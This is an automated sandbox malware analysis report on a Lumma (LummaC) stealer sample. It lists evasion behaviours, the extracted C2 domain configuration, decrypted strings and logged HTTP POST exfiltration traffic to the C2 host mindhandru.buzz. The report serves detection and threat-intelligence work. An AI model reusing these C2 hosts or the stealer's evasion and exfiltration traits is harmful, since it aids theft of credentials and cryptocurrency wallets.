Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XM6cn2uNux.exe

Overview

General Information

Sample name:XM6cn2uNux.exe
renamed because original name is a hash value
Original sample name:a3f5c08ac61228829905f46d3e4e9dc5.exe
Analysis ID:1580875
MD5:a3f5c08ac61228829905f46d3e4e9dc5
SHA1:f412251760048ed7d1f078fa3de654fe8c52262c
SHA256:2791569a37e501f3c7b0c74aa2a75adaf30a07852c13e0f9d0fc658a948fe8c7
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • XM6cn2uNux.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\XM6cn2uNux.exe" MD5: A3F5C08AC61228829905F46D3E4E9DC5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "mindhandru.buzz", "appliacnesot.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2777182643.0000000001263000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:45:12.336203+010020283713Unknown Traffic192.168.2.649714172.67.165.185443TCP
                2024-12-26T12:45:16.458009+010020283713Unknown Traffic192.168.2.649720172.67.165.185443TCP
                2024-12-26T12:45:19.228606+010020283713Unknown Traffic192.168.2.649736172.67.165.185443TCP
                2024-12-26T12:45:28.698182+010020283713Unknown Traffic192.168.2.649760172.67.165.185443TCP
                2024-12-26T12:46:12.433761+010020283713Unknown Traffic192.168.2.649860172.67.165.185443TCP
                2024-12-26T12:47:24.388227+010020283713Unknown Traffic192.168.2.650006172.67.165.185443TCP
                2024-12-26T12:47:26.599901+010020283713Unknown Traffic192.168.2.650007172.67.165.185443TCP
                2024-12-26T12:47:28.145167+010020283713Unknown Traffic192.168.2.650008172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:45:15.142184+010020546531A Network Trojan was detected192.168.2.649714172.67.165.185443TCP
                2024-12-26T12:45:17.258145+010020546531A Network Trojan was detected192.168.2.649720172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:45:15.142184+010020498361A Network Trojan was detected192.168.2.649714172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:45:17.258145+010020498121A Network Trojan was detected192.168.2.649720172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T12:45:27.250374+010020480941Malware Command and Control Activity Detected192.168.2.649736172.67.165.185443TCP
                2024-12-26T12:46:10.836888+010020480941Malware Command and Control Activity Detected192.168.2.649760172.67.165.185443TCP
                2024-12-26T12:47:22.368235+010020480941Malware Command and Control Activity Detected192.168.2.649860172.67.165.185443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: XM6cn2uNux.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://mindhandru.buzz:443/apiAvira URL Cloud: Label: malware
                Found malware configuration
                Source: XM6cn2uNux.exe.5448.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "inherineau.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "mindhandru.buzz", "appliacnesot.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: XM6cn2uNux.exeVirustotal: Detection: 53%Perma Link
                Source: XM6cn2uNux.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: XM6cn2uNux.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: XM6cn2uNux.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.6:50008 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49720 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49720 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49736 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49760 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49860 -> 172.67.165.185:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49760 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49860 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50006 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3C0DBROOYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GGOM7NCR28HLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=21HZVP8BZL9GZS5N5LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19963Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: XM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3498179672.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3493218176.000000000128D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3493013249.000000000128D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/.$
                Source: XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3498179672.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api$M
                Source: XM6cn2uNux.exe, 00000000.00000003.3496261170.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3496047879.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apijs
                Source: XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apin
                Source: XM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/d
                Source: XM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550214215.0000000001252000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543162097.0000000001252000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557552788.0000000001252000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/s4
                Source: XM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/api
                Source: XM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apiF
                Source: XM6cn2uNux.exe, 00000000.00000003.3536280869.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520973311.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apily
                Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: XM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
